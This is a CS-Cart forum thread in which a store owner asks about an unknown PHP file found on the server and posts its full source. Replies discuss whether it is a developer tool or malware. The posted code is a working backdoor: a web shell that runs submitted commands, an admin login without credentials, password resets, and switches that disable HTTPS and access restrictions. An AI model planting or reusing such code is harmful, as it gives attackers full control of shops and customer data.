Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Strange File In Public_Html Rate Topic   - - - - -

 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 05 November 2014 - 06:58 PM #1

I've recently noticed a file in the public_html folder, its name is /enterle.php and the code in it is as follows, Ive changed the password details in case it is sensitive info.

if ($_GET['mode'] == 'shell'){
echo '
<body bgcolor="black" TEXT="#FFFFFF">
<form action="sph.php?mode=shell" name="shell" method="post">
<input type="text" name="cmd" value="';
echo $_POST['cmd'];
echo '" size="50"/>&nbsp;
<input type="submit" value="POST request" />
</form>
<br /><br />
';

if ($_POST['cmd']){
exec($_POST['cmd'], $out);

foreach ($out as $k => $v){
echo "<pre>".$v."</pre>";
}
}
echo '
</body>
';
die();
}

DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
define('ACCOUNT_TYPE', 'admin');

require './prepare.php';
require './init.php';

if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '-------------------';
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'membership_id' => '0',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '------------------';
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N','Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'logout') {
$auth = array();
unset($_SESSION['auth']);
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'change_password') {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5('5894admin'));
echo "Password Changed to '5894admin'!";
}

if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", $_GET['passwd']);
echo "Password Restored to $_GET[passwd]!";
}

if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
echo "Password Restored to $_GET[passwd]!";
}

if ($_GET['mode'] == 'remove_https') {
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'");
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
echo "HTTPS disabled!";
}

if ($_GET['mode'] == 'ignore_AR') {
db_query("UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'");
echo "Access Restriction is disabled!";
}

if ($_GET['mode'] == 'phpinfo') {
phpinfo();
}

?>

Should i be worried about this file and what is it's purpose?
Is this a standard CsCart file?

 

Posted 05 November 2014 - 07:33 PM #2

Not a standard CS-Cart file.

This looks to be a tool script used to troubleshoot common issues. Have you had anyone assist you with your site? If so, I would contact them.

Jeremy
Requin Creative Group
CS-Cart License | CS-Cart Addons


 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11405 posts

Posted 05 November 2014 - 11:58 PM #3

Get rid of it. It is insecure and circumvents all security in the cart. It allows a caller to change your admin password, disable access restrictions and turns off any https settings you have.

It is malware and you should change all your cPanel and FTP passwords immediately.
Would strongly suggest you also change your primary admin password and force all admin users to change their passwords upon next login.

EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • Alt-team
  • CS-Cart Developer
  • Authorized Reseller
  • Join Date: 18-Jan 11
  • 2687 posts

Posted 06 November 2014 - 08:38 AM #4

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.

ADD-ONS  Web development service  | CS-Cart dedicated developers

Buy MULTIVENDOR - USD 1250 (14% off)   Buy CS-CART LICENCE - USD 345 (13% off)

 Email - manager@alt-team.com | Skype - Altteam    


 
  • eComLabs
  • CS-Cart Expert
  • Authorized Reseller
  • Join Date: 27-Jan 14
  • 19794 posts

Posted 06 November 2014 - 09:03 AM #5

Similar files are used by developers to log in the admin panel, make backups and other actions. Please contact the developer who worked on your server and ask him if he forgot to delete the file after the work has been done.

GET A FREE QUOTE | CS-Cart Add-ons | CS-Cart Licenses | CS-Cart Development | CS-Cart Design | Server Configuration | UniTheme and YOUPI
CS-Cart                USD 345     Multi-Vendor              USD 1250    CS-Cart RU                         24500 руб.
CS-Cart Ultimate  USD 775     CS-Cart + YOUPI      USD 545      CS-Cart RU + UniTheme    36000 руб.


 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 10:53 PM #6

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.


I've just gone over my past posts and realized the answer given by Alt Team, can i point out this code was put in and left in my public.html folder by one of your developers, (its been removed and all passwords changed) i am now concerned as to the level of professionalism as this code sounds like it should of been removed by the person or persons who put it there in the first place.

I look forward to your reply Alt Team.

 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11405 posts

Posted 20 January 2015 - 10:57 PM #7

Actually, it should never be done that way at all.
You should provide ANY developer (or anyone outside your business) with an admin account you can disable and FTP credentials you can also disable or remove after work is completed. No developer should be using a direct script to modify any admin passwords or other manipulation of user credentials.

EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 11:28 PM #8

As they say you live and learn and as i am not a developer i put my trust in Alt Team, they were given both admin passwords and FTP credentials so alarm bells are ringing as to why the developer felt the need to use this script.

My concerns now are what else is lurking in the back ground.

 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 11:30 PM #9

But as i have already said i will wait and see what Alt Team reply with.

 
  • Alt-team
  • CS-Cart Developer
  • Authorized Reseller
  • Join Date: 18-Jan 11
  • 2687 posts

Posted 21 January 2015 - 12:22 PM #10

Dear Swifty,

We have sent you the PM.

Best regards, Alt-team.

ADD-ONS  Web development service  | CS-Cart dedicated developers

Buy MULTIVENDOR - USD 1250 (14% off)   Buy CS-CART LICENCE - USD 345 (13% off)

 Email - manager@alt-team.com | Skype - Altteam